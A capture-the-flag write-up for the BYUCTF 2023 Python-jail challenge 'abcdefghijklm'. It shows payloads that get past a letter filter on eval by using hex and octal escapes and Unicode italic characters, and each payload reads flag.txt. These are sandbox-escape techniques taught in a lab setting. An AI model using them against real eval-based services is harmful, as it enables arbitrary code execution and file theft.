BYUCTF 2023 – abcdefghijklm

abcdefghijklm

You can't use any of the first 13 letters of the alphabet EXCEPT for the first 4 letters of your input

OH and don't make it too long

inp = input("code > ").lower()
eval((inp[:4]+__import__("re").sub(r'[a-m]','',inp[4:]))[:80])

We can use the first 4 characters without restriction. Thus we can use either eval or exec.

Here is the example payload that we would want to use :

exec("print(open('flag.txt').read())")

To escape letters filters, we can use hex and octal char representation as below :

exec("pr\x69nt(op\x65n('\x66'+'\154'+'\x61\x67.txt').r\x65\x61\x64())")

or use full octal representation :

exec("pr\151nt(op\145n('\146\154\141\147.txt').r\145\141\144())")

Finally, we can also bypass all restrictions using unicode encoding :

𝘦𝘹𝘦𝘤("𝘱𝘳𝘪𝘯𝘵(𝘰𝘱𝘦𝘯('𝘧𝘭𝘢𝘨.𝘵𝘹𝘵').𝘳𝘦𝘢𝘥())")

Website for string to hex encoding : string-functions.com/string-hex.aspx

Website for string to unicode encoding : qaz.wtf/u/convert.cgi